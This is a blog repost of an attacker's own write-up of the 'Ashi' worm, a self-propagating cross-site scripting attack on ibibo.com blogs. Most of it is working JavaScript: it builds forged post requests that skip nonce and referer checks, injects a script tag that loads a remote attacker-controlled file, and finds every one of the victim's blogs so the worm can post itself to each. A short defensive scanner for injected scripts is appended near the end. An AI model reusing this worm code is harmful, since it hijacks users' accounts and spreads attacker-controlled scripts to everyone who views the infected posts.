Demystifying The Ashi virus--"vinnu"

    The Ashi virus was developed by "vinnu" bhai last year. It was a perfect example of a self-propagating virus. Let me post his original paper here; it gives a better view of how worms and viruses are built and what they are capable of.

    Vulnerability: I found several XSS vulnerabilities in ibibo.com. Next, I searched for a good point from which to automate the leveraging process. I found two PHP pages, post.php and new-post.php, which submit my blog posts, and both the title and the content were prone to XSS. So I developed a script to find out the form elements:

    javascript:var vin=document.getElementsByTagName("form")[0];var nunnu;for(var iter=0;iter<vin.length;iter++){if(iter==0){nunnu=vin.item(iter).name+"="+vin.item(iter).value;}else{nunnu+="&"+vin.item(iter).name+"="+vin.item(iter).value;}}alert(nunnu);

    The above script retrieves the form elements and their values. So now I had the script (you have to alter the above script a little, increasing the form index to a suitable value to reach the target form):

    javascript:var vin=document.getElementsByTagName("form")[2];var nunnu;for(var iter=0;iter<vin.length;iter++){if(iter==0){nunnu=vin.item(iter).name+"="+vin.item(iter).value;}else{nunnu+="&"+vin.item(iter).name+"="+vin.item(iter).value;}}alert(nunnu);

    Paste the above script into the address bar of the browser once the page "http://blogs.ibibo.com/<your-blog>/wp-admin/" has opened. I wrote "Namaste" in the title and "Hows the life there" in the content box. It gave me the following in a dialogue box:

    post_title=Namaste&content=Hows the life there&tags_input=&action=post-quickpress-save&quickpress_post_ID=0&_wpnonce=3a7721d78d&_wp_http_referer=/vulnerable/wp-admin/&save=Save Draft&=Cancel&publish=Publish

    It seems they check a referer (_wp_http_referer) and a nonce (_wpnonce), although the nonce was the same every time I tried to post. Still, the nonce appears on a page which cannot be directly XSSed, so I simply tried posting the request without the referer and the nonce.

    javascript:blog();
    function blog(){
        // Markup for a script element that loads the remote file; "script" is concatenated from two pieces
        var nunnu="><scr"+"ipt language=javascript"+" src='http://sites.google.com/site/urcontrolledsite/ibibo.js'>"+"<scr"+"ipt>";
        quote="Sahdi bhasa sahdi jaan hai ji, tusaan sunhsaa...";
        var blpayload="post_title="+quote;
        alert(nunnu);
        blpayload+=encodeURIComponent(nunnu);
        blpayload+="&content=Jaijeya";
        blpayload+=encodeURIComponent(nunnu);
        // _wpnonce and _wp_http_referer are sent empty; the server accepted the post anyway
        blpayload+="hor&tags_input=&action=post-quickpress-save&quickpress_post_ID=0&_wpnonce=&_wp_http_referer=&save=Save%20Draft&=Cancel&publish=Publish";
        alert(blpayload);
        ajaxPSLV("http://blogs.ibibo.com/vulnerable/wp-admin/post.php",blpayload);
    }
    function ajaxPSLV(url, payload){
        alert("url:\t"+url+"\npayload:\n"+payload);
        var xmlhttp;
        if (window.XMLHttpRequest) {
            xmlhttp = new XMLHttpRequest();
        } else if (window.ActiveXObject) {
            try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }
            catch (e) { try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { return; } }
        }
        alert("sending"); xmlhttp.open("POST", url, true);
        xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        xmlhttp.setRequestHeader("Content-length", payload.length);
        alert("sending:\t"+payload.length);
        xmlhttp.send(payload); alert("sent");
    }
    alert("done");

    It worked: it posted the blog even without the nonce and referer in the request. But there was a problem. The script appeared in the heading, and I also wanted the script to post a different topic every time it executed, so I introduced the well-known circuit for choosing one string out of a list:

    var no=Math.floor(Math.random()*10);
    var quote=new Array(10);
    quote[0]="Sahdi bhasa sahdi jaan...";
    quote[1]="Don't you think we can...";
    quote[2]="Thats the attitude...Keep it up.";
    quote[3]="Intelligent?..";
    quote[4]="Main koi machine thodi hai...";
    quote[5]="Jaijeya ji! Theek hainn na?...";
    quote[6]="Veero! Tusaan Eh bhi parhi leya";
    quote[7]="Himachal a heaven...";
    quote[8]="Free Tibet...";
    quote[9]="Pahari (Kangri) dialoge must be respected and registered as a language...";
    var blpayload="post_title="+quote[no];

    After assembling it with the above script I got the following code:

    javascript:blog();
    function blog(){
        // Remote-loader script element plus an anchor whose onmouseover calls blog() again
        var nunnu="><scr"+"ipt language=javascript"+" src='http://sites.google.com/site/urcontrolledsite/ibibo.js'>"+"</scr"+"ipt><a href=\"\" onmouseover=javascript:blog();>Jaijeya</a><a ";
        // Pick one of ten titles at random so repeated posts differ
        var no=Math.floor(Math.random()*10);
        var quote=new Array(10);
        quote[0]="Sahdi bhasa sahdi jaan...";
        quote[1]="Don't you think we can...";
        quote[2]="Thats the attitude...Keep it up.";
        quote[3]="Intelligent?..";
        quote[4]="Main koi machine thodi hai...";
        quote[5]="Jaijeya ji! Theek hainn na?...";
        quote[6]="Veero! Tusaan Eh bhi parhi leya";
        quote[7]="Himachal a heaven...";
        quote[8]="Free Tibet...";
        quote[9]="Pahari (Kangri) dialoge must be respected and registered as a language...";
        var blpayload="post_title="+quote[no];
        blpayload+=encodeURIComponent(nunnu);
        blpayload+="&content=Jaijeya</p></div";
        blpayload+=encodeURIComponent(nunnu);
        // Nonce and referer fields are sent empty; the server did not check them
        blpayload+="hor&tags_input=&action=post-quickpress-save&quickpress_post_ID=0&_wpnonce=&_wp_http_referer=&save=Save%20Draft&=Cancel&publish=Publish";
        alert(blpayload);
        ajaxPSLV("http://blogs.ibibo.com/vulnerable/wp-admin/post.php",blpayload);
    }
    function ajaxPSLV(url, payload){
        alert("url:\t"+url+"\npayload:\n"+payload);
        var xmlhttp;
        if (window.XMLHttpRequest) {
            xmlhttp = new XMLHttpRequest();
        } else if (window.ActiveXObject) {
            try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }
            catch (e) {
                try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { return; }
            }
        }
        alert("sending"); xmlhttp.open("POST", url, true);
        xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        xmlhttp.setRequestHeader("Content-length", payload.length);
        alert("sending:\t"+payload.length);
        xmlhttp.send(payload); alert("sent");
    }
    alert("done");

    But I don't want my worm to post only to a hardcoded blog. It must find all the blogs of the user and inject posts into each of them, as the above post did. To do this I have to check the hrefs of all the anchors, because the blog names appear within the page and clicking any one of them switches to the respective blog.

    javascript:var vin=document.getElementsByTagName("a");var nunn="";for(var i=0;i<vin.length;i++){nunn+=vin[i].href+"\n";}alert(nunn);

    But there are also several other items along with the blogs, so my virus must distinguish the blogs from the other objects. I checked the pattern, and after careful inspection I found that the hrefs containing wp-admin are the references to the user's blogs. So I developed another script to check it:

    javascript:test();
    function test() {
        var list="";
        var vin=document.getElementsByTagName("a");
        var total=0;var index=0;var address;
        var intex=0;
        for(var iter=0;iter<vin.length;iter++){
            // "wp-admin" in the href marks a link to one of the user's blogs; index+8 keeps the href up to and including it
            if((index=vin[iter].href.indexOf("wp-admin"))!=-1){
                address=vin[iter].href.substring(0,index+8)+"/post.php";
                list += address+"\n";intex++;
            }
        }
        alert(intex+"\n"+list);
    }

    Now I have a way to identify the blogs among the other objects and to post the random topics. By combining all of these, a beast started to take shape:

    javascript:trigger();
    function trigger() {
        // Every anchor whose href contains "wp-admin" is treated as one of the user's blogs
        var vin=document.getElementsByTagName("a");
        var total=0;var index=0;var address;
        for(var iter=0;iter<vin.length;iter++){
            if((index=vin[iter].href.indexOf("wp-admin"))!=-1){
                address=vin[iter].href.substring(0,index+8)+"/post.php";
                blog(address);
            }
        }
    }
    function blog(addr){
        var nunnu="><scr"+"ipt language=javascript"+" src='http://sites.google.com/site/urcontrolledsite/ibibo.js'>"+"</scr"+"ipt><a href=\"\" onmouseover=javascript:blog();>Jaijeya</a><a ";
        var no=Math.floor(Math.random()*10);
        var quote=new Array(10);
        quote[0]="Sahdi bhasa sahdi jaan...";
        quote[1]="Don't you think we can...";
        quote[2]="Thats the attitude...Keep it up.";
        quote[3]="Intelligent?..";
        quote[4]="Main koi machine thodi hai...";
        quote[5]="Jaijeya ji! Theek hainn na?...";
        quote[6]="Veero! Tusaan Eh bhi parhi leya";
        quote[7]="Himachal a heaven...";
        quote[8]="Free Tibet...";
        quote[9]="Pahari (Kangri) dialoge must be respected and registered as a language...";
        var blpayload="post_title="+quote[no];
        blpayload+=encodeURIComponent(nunnu);
        blpayload+="&content=Jaijeya</p></div";
        // The content field now carries an inline script that eval()s the loader string
        blpayload+=encodeURIComponent("><"+"sc"+"ript language=javascript>var ashi='"+nunnu+"';eval(ashi);<"+"/sc"+"ript>");
        blpayload+="hor&tags_input=&action=post-quickpress-save&quickpress_post_ID=0&_wpnonce=&_wp_http_referer=&save=Save%20Draft&=Cancel&publish=Publish";
        alert(blpayload); ajaxPSLV(addr,blpayload);
    }
    function ajaxPSLV(url, payload) {
        alert("url:\t"+url+"\npayload:\n"+payload);
        var xmlhttp;
        if (window.XMLHttpRequest) {
            xmlhttp = new XMLHttpRequest();
        } else if (window.ActiveXObject) {
            try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }
            catch (e) {
                try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { return; }
            }
        }
        alert("sending"); xmlhttp.open("POST", url, true);
        xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        xmlhttp.setRequestHeader("Content-length", payload.length);
        alert("sending:\t"+payload.length);
        xmlhttp.send(payload); alert("sent");
    }

    But I thought the title was not a good place to inject the code, as it would appear in the dashboard. So I placed the code in the post.php argument named "content" instead of "post_title". The variable "nunnu" contains the code for a script element which retrieves the remote JavaScript file at:
    http://sites.google.com/site/urcontrolledsite/ibibo.js
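    As an added example (not the worm's code, nor ibibo's), here is a sweep a responder could run over stored posts to find the three injection patterns this writeup describes: a remote script src, an inline script body, and an on* handler on an injected element. The sample posts and the attacker.example host are constructed.

```javascript
const PATTERNS = [
  // <script ... src=...>: the remote-loader form; captures the src value
  { kind: "external-script", re: /<script\b[^>]*\bsrc\s*=\s*['"]?([^'"\s>]+)/gi },
  // inline <script>...</script> bodies, e.g. the eval() wrapper placed in the content field
  { kind: "inline-script", re: /<script\b[^>]*>([\s\S]*?)<\/script>/gi },
  // on*= handlers on any element, e.g. the onmouseover= on the injected anchor
  { kind: "event-handler", re: /\bon[a-z]+\s*=\s*["']?([^"'\s>]*)/gi },
];

// Returns one finding per match: { id, field, kind, value } (value truncated to 80 chars).
function findInjectedScripts(posts) {
  const findings = [];
  for (const post of posts) {
    for (const field of ["title", "content"]) {
      const text = post[field] || "";
      for (const { kind, re } of PATTERNS) {
        re.lastIndex = 0;                     // shared global regex: restart per text
        let m;
        while ((m = re.exec(text)) !== null) {
          const value = m[1].trim();
          if (kind === "inline-script" && value === "") continue;  // empty body: an external tag, already counted
          findings.push({ id: post.id, field, kind, value: value.slice(0, 80) });
        }
      }
    }
  }
  return findings;
}

// Distinct hosts that injected <script src> tags load from: the first thing to block and look up.
function externalScriptHosts(findings) {
  const hosts = new Set();
  for (const f of findings) {
    if (f.kind !== "external-script") continue;
    try { hosts.add(new URL(f.value).host); } catch (e) { hosts.add(f.value); }
  }
  return [...hosts].sort();
}

// Constructed sample: one clean post and one carrying all three patterns.
const SAMPLE_POSTS = [
  { id: 1, title: "Namaste", content: "<p>Hows the life there</p>" },
  { id: 2,
    title: `Himachal a heaven..."><script language=javascript src='http://attacker.example/ibibo.js'></script><a href="" onmouseover=javascript:blog();>Jaijeya</a><a `,
    content: `Jaijeya</p></div><script language=javascript>var ashi='...';eval(ashi);</script>hor` },
];
```

    Findings are for review rather than automatic deletion: legitimate posts can contain markup, and the post ids tell you which accounts were used to spread.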
    This article was originally published in the blog Demystifying The Ashi virus--"vinnu", started by prashant_uniyal.

    Comments (1)

    soul301:
    great .. awesome work.. nice and hats off to you guys